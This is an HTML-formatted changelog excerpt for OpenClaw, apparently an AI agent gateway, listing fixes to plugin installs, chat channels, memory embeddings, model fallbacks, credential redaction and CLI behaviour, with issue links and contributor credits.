<li>Plugins/package: force nested bundled-plugin runtime dependency installs out of inherited npm dry-run mode during prepack and package smoke checks, so packed installs materialize required plugin modules instead of reporting missing bundled files. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339840741" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73128/hovercard" href="https://github.com/openclaw/openclaw/issues/73128">#73128</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adam-Researchh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adam-Researchh">@Adam-Researchh</a>.</li>
<li>Discord: skip reaction events before REST channel fetch when notifications are off, guild reactions are disabled, or allowlist mode cannot match without channel overrides, reducing reconnect bursts that caused slow listener warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339855498" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73133" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73133/hovercard" href="https://github.com/openclaw/openclaw/issues/73133">#73133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/isaacsummers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/isaacsummers">@isaacsummers</a>.</li>
<li>Channels/Telegram: centralize polling update tracking so accepted offsets remain durable across restarts, same-process handler failures can still retry, and slow offset writes cannot overwrite newer accepted watermarks. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339707241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73115/hovercard" href="https://github.com/openclaw/openclaw/issues/73115">#73115</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vdruts/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vdruts">@vdruts</a>.</li>
<li>Agents/models: classify empty, reasoning-only, and planning-only terminal agent runs before accepting a model fallback candidate, so invalid or incompatible models can advance to the next configured fallback instead of returning a 30-second terminal failure. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339707241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73115/hovercard" href="https://github.com/openclaw/openclaw/issues/73115">#73115</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vdruts/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vdruts">@vdruts</a>.</li>
<li>Memory/LanceDB: let embedding config use provider-backed auth profiles, environment credentials, or provider config without a separate plugin <code>embedding.apiKey</code>, so OAuth-capable embedding providers can power auto-recall/capture. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290795041" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68950/hovercard" href="https://github.com/openclaw/openclaw/issues/68950">#68950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/malshaalan-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/malshaalan-ai">@malshaalan-ai</a>.</li>
<li>CLI/parents: invoking <code>openclaw &lt;parent&gt;</code> (memory, channels, plugins, approvals, devices, cron, mcp) without a subcommand now prints the parent's help and exits <code>0</code>, matching <code>&lt;parent&gt; --help</code> and the existing <code>agents</code> / <code>sessions</code> defaults so shell <code>&amp;&amp;</code> chains and pnpm wrappers no longer surface a misleading <code>ELIFECYCLE Command failed with exit code 1.</code> line. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339375554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73077/hovercard" href="https://github.com/openclaw/openclaw/issues/73077">#73077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/hooks: time out never-settling <code>agent_end</code> observation hooks after 30 seconds and log the plugin failure, so hung embedding endpoints no longer leave memory capture silently pending forever. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249867560" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65544" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65544/hovercard" href="https://github.com/openclaw/openclaw/issues/65544">#65544</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ghoc0099/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ghoc0099">@ghoc0099</a>.</li>
<li>Gateway/config: serve runtime config schemas from the current plugin metadata snapshot and generated bundled channel schema metadata instead of rebuilding plugin channel config modules on every <code>config.get</code>/<code>config.schema</code>, preventing idle plugin-discovery CPU churn after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339511644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73088/hovercard" href="https://github.com/openclaw/openclaw/issues/73088">#73088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sleitor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sleitor">@sleitor</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geovansb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geovansb">@geovansb</a>.</li>
<li>Memory/LanceDB: call OpenAI-compatible embedding endpoints through the raw SDK transport without sending <code>encoding_format</code>, then normalize float-array or base64 responses so providers such as ZhiPu and DashScope no longer fail recall with wrong vector dimensions or rejected parameters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230976508" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63655/hovercard" href="https://github.com/openclaw/openclaw/issues/63655">#63655</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kinthaiofficial/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kinthaiofficial">@kinthaiofficial</a>.</li>
<li>Plugins/install: run dependency installs with npm error-level logging instead of silent mode so failed plugin or hook installs surface actionable npm errors such as EUNSUPPORTEDPROTOCOL instead of <code>npm install failed:</code> with no detail. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339561417" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73093" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73093/hovercard" href="https://github.com/openclaw/openclaw/pull/73093">#73093</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanctrl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanctrl">@sanctrl</a>.</li>
<li>Memory/LanceDB: bound memory recall embedding queries with a new <code>recallMaxChars</code> setting, prefer the latest user message over channel prompt metadata during auto-recall, and document the knob so small Ollama embedding models avoid context-length failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162415456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56780/hovercard" href="https://github.com/openclaw/openclaw/issues/56780">#56780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rungmc357/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rungmc357">@rungmc357</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zak-collaborator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zak-collaborator">@zak-collaborator</a>.</li>
<li>CLI/skills: resolve workspace-backed skills commands from <code>--agent</code>, then the current agent workspace, before falling back to the default agent, so multi-agent ClawHub installs, updates, and status checks stay scoped to the active workspace. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4157320909" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56161" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56161/hovercard" href="https://github.com/openclaw/openclaw/issues/56161">#56161</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334459577" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72726/hovercard" href="https://github.com/openclaw/openclaw/pull/72726">#72726</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/langbowang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/langbowang">@langbowang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>.</li>
<li>Plugin SDK: fall back from partial bundled plugin directory overrides to package source public surfaces while preserving <code>OPENCLAW_DISABLE_BUNDLED_PLUGINS</code> as a hard disable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335993735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72817" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72817/hovercard" href="https://github.com/openclaw/openclaw/pull/72817">#72817</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/serkonyc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/serkonyc">@serkonyc</a>.</li>
<li>Agents/ACPX: stop forwarding Codex ACP timeout config controls that Codex rejects while preserving OpenClaw's run-timeout watchdog for ACP subagents. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339011227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73052" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73052/hovercard" href="https://github.com/openclaw/openclaw/issues/73052">#73052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pfrederiksen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pfrederiksen">@pfrederiksen</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richa65/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richa65">@richa65</a>.</li>
<li>Memory Core: stream fallback vector search scoring with a bounded top-K result set so large indexes do not materialize every chunk embedding when sqlite-vec is unavailable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339283981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73069" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73069/hovercard" href="https://github.com/openclaw/openclaw/pull/73069">#73069</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/parkertoddbrooks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/parkertoddbrooks">@parkertoddbrooks</a>.</li>
<li>Memory Core: stream embedding-cache seeding during safe reindex so large local caches do not materialize every row into the V8 heap before the atomic rebuild. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339268869" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73067" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73067/hovercard" href="https://github.com/openclaw/openclaw/pull/73067">#73067</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/parkertoddbrooks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/parkertoddbrooks">@parkertoddbrooks</a>.</li>
<li>Memory/Ollama: add <code>memorySearch.remote.nonBatchConcurrency</code> for inline embedding indexing, default Ollama non-batch indexing to one request at a time, and keep batch concurrency separate from non-batch concurrency so local embedding backfills avoid timeout storms on smaller hosts. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4171036314" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57733" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57733/hovercard" href="https://github.com/openclaw/openclaw/pull/57733">#57733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itilys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itilys">@itilys</a>.</li>
<li>macOS app: update Peekaboo, ElevenLabsKit, and MLX TTS helper dependencies, make canvas file watching and config/exec-approval state writes reliable under concurrent app/test activity, and keep the app plus helper builds warning-free. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blaizzy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blaizzy">@Blaizzy</a>.</li>
<li>iOS app: refresh SwiftPM/XcodeGen source hygiene, make app, extension, watch, and curated shared Swift files pass the prebuild SwiftFormat and SwiftLint checks, move relay registration off deprecated StoreKit receipt APIs, and keep simulator builds and logic tests warning-free. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Agents/models: keep <code>models.json</code> readiness and provider-hook caches warm across repeated agent and subagent model resolution while preserving external <code>models.json</code> invalidation, reducing repeated provider-plugin loads on slower ARM64 hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339372396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73075/hovercard" href="https://github.com/openclaw/openclaw/issues/73075">#73075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</li>
<li>Docs/tools: clarify that <code>tools.profile: "messaging"</code> is intentionally narrow and that <code>tools.profile: "full"</code> is the unrestricted baseline for broader command/control access. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041419805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39954/hovercard" href="https://github.com/openclaw/openclaw/pull/39954">#39954</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/posigit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/posigit">@posigit</a>.</li>
<li>Control UI/Agents: redact tool-call args, partial/final results, derived exec output, and configured custom secret patterns before streaming tool events to the Control UI, so tool output cannot expose provider or channel credentials. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331444788" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72283/hovercard" href="https://github.com/openclaw/openclaw/issues/72283">#72283</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331637860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72319" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72319/hovercard" href="https://github.com/openclaw/openclaw/pull/72319">#72319</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/volcano303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/volcano303">@volcano303</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/sessions: keep <code>sessions_history</code> recall redaction enabled even when general log redaction is disabled, and clarify that safety-boundary UI/tool/diagnostic payloads still redact independently of <code>logging.redactSensitive</code>. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331637860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72319" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72319/hovercard" href="https://github.com/openclaw/openclaw/pull/72319">#72319</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/volcano303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/volcano303">@volcano303</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Providers/Codex: pass agent and workspace directories into provider stream wrappers so Codex native <code>web_search</code> activation can evaluate the correct auth context, and smoke-test the built status-message runtime by resolving the emitted bundle name. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278884433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67843" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67843/hovercard" href="https://github.com/openclaw/openclaw/pull/67843">#67843</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254105422" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65909" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65909/hovercard" href="https://github.com/openclaw/openclaw/issues/65909">#65909</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neilofneils404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neilofneils404">@neilofneils404</a>.</li>
<li>Cron/models: keep <code>payload.model</code> as a per-job primary that can use configured fallbacks, while still letting <code>payload.fallbacks: []</code> make cron runs strict and avoid hidden agent-primary retries. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338698277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73023" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73023/hovercard" href="https://github.com/openclaw/openclaw/issues/73023">#73023</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pavelyortho-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pavelyortho-cyber">@pavelyortho-cyber</a>.</li>
<li>Models/fallbacks: treat user-selected session models as exact choices, so <code>/model ollama/...</code> and model-picker switches fail visibly when the selected provider is unreachable instead of answering from an unrelated configured fallback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338698277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73023" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73023/hovercard" href="https://github.com/openclaw/openclaw/issues/73023">#73023</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pavelyortho-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pavelyortho-cyber">@pavelyortho-cyber</a>.</li>
<li>Codex harness: keep ChatGPT subscription app-server runs from inheriting <code>CODEX_API_KEY</code> or <code>OPENAI_API_KEY</code>, and fall back to <code>CODEX_API_KEY</code> / <code>OPENAI_API_KEY</code> app-server login only when no Codex account is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339128579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73057" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73057/hovercard" href="https://github.com/openclaw/openclaw/issues/73057">#73057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/holgergruenhagen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/holgergruenhagen">@holgergruenhagen</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>CLI/model probes: fail local <code>infer model run</code> probes when the provider returns no text output, so unreachable local providers and empty completions no longer look like successful smoke tests. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338698277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73023" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73023/hovercard" href="https://github.com/openclaw/openclaw/issues/73023">#73023</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pavelyortho-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pavelyortho-cyber">@pavelyortho-cyber</a>.</li>
<li>CLI/Ollama: run local <code>infer model run</code> through the lean provider completion path and skip global model discovery for one-shot local probes, so Ollama smoke tests no longer pay full chat-agent/tool startup cost or hang before the native <code>/api/chat</code> request. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336516073" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72851/hovercard" href="https://github.com/openclaw/openclaw/issues/72851">#72851</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TotalRes2020/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TotalRes2020">@TotalRes2020</a>.</li>
<li>Doctor/gateway services: ignore launchd/systemd companion services that only reference the gateway as a dependency, suppress inactive Linux extra-service warnings, and avoid rewriting a running systemd gateway command/entrypoint during doctor repair. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4039248468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39118" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39118/hovercard" href="https://github.com/openclaw/openclaw/pull/39118">#39118</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/therk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/therk">@therk</a>.</li>
<li>Daemon/service: only emit hard-coded version-manager paths such as <code>~/.volta/bin</code>, <code>~/.asdf/shims</code>, <code>~/.bun/bin</code>, and fnm/pnpm fallbacks into gateway and node service PATHs when the directories exist, so <code>openclaw doctor</code> no longer flags <code>gateway.path.non-minimal</code> against a PATH the daemon just wrote. Env-driven roots and stable user-bin dirs remain unconditional. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329986857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71944/hovercard" href="https://github.com/openclaw/openclaw/issues/71944">#71944</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330028013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71964" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71964/hovercard" href="https://github.com/openclaw/openclaw/pull/71964">#71964</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>CLI/startup: disable Node's module compile cache automatically for live source-checkout launchers so in-place <code>pnpm build</code> updates are visible to the next <code>openclaw</code> CLI invocation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338808471" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73037" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73037/hovercard" href="https://github.com/openclaw/openclaw/issues/73037">#73037</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LouisGameDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LouisGameDev">@LouisGameDev</a>.</li>
<li>Agents/group chat: keep silent-allowed empty and reasoning-only turns on the <code>NO_REPLY</code> path without injecting visible-answer retry prompts, and clarify the group prompt so agents use the exact silent token instead of prose. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/group chat: move <code>NO_REPLY</code> mechanics into channel-aware direct/group prompts and suppress the duplicate generic silent-reply section for auto-reply runs, so always-on group agents get one consistent stay-silent instruction. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/OpenAI: preserve encrypted empty-summary Responses reasoning items in WebSocket replay and request <code>reasoning.encrypted_content</code> on reasoning turns so GPT-5.4/GPT-5.5 sessions do not lose required <code>rs_*</code> state beside <code>msg_*</code> items. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339067221" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73053" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73053/hovercard" href="https://github.com/openclaw/openclaw/issues/73053">#73053</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/odb36777/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/odb36777">@odb36777</a>.</li>
<li>Gateway/startup: treat <code>plugins.enabled=false</code> as an early plugin fast path, skipping plugin auto-enable discovery, gateway plugin lookup/runtime-dependency staging, and stale-plugin cleanup warnings while preserving channel blocker warnings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338846905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73041" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73041/hovercard" href="https://github.com/openclaw/openclaw/pull/73041">#73041</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WuKongAI-CMU/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WuKongAI-CMU">@WuKongAI-CMU</a>.</li>
<li>Channels/commands: make generated <code>/dock-*</code> commands switch the active session reply route through <code>session.identityLinks</code> instead of falling through to normal chat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293284812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69206/hovercard" href="https://github.com/openclaw/openclaw/issues/69206">#69206</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338791805" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73033" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73033/hovercard" href="https://github.com/openclaw/openclaw/pull/73033">#73033</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clawbones/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clawbones">@clawbones</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/michaelatamuk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/michaelatamuk">@michaelatamuk</a>.</li>
<li>Providers/Cloudflare AI Gateway: strip assistant prefill turns from Anthropic Messages payloads when thinking is enabled, so Claude requests through Cloudflare AI Gateway no longer fail Anthropic conversation-ending validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337166380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72905" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72905/hovercard" href="https://github.com/openclaw/openclaw/issues/72905">#72905</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338428671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73005/hovercard" href="https://github.com/openclaw/openclaw/pull/73005">#73005</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AaronFaby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AaronFaby">@AaronFaby</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
